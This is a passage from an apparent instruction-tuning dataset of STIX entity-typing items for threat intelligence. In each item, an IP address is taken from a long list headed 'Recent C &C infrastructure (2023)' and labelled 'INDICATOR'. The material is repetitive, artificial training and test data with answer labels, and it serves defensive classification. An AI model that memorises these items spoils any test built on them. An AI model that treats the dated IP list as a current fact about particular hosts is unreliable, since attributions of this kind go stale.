84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n161.35.95.47\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n165.227.48.59\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n170.64.188.146\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n165.232.120.169\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n89.185.84.45\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 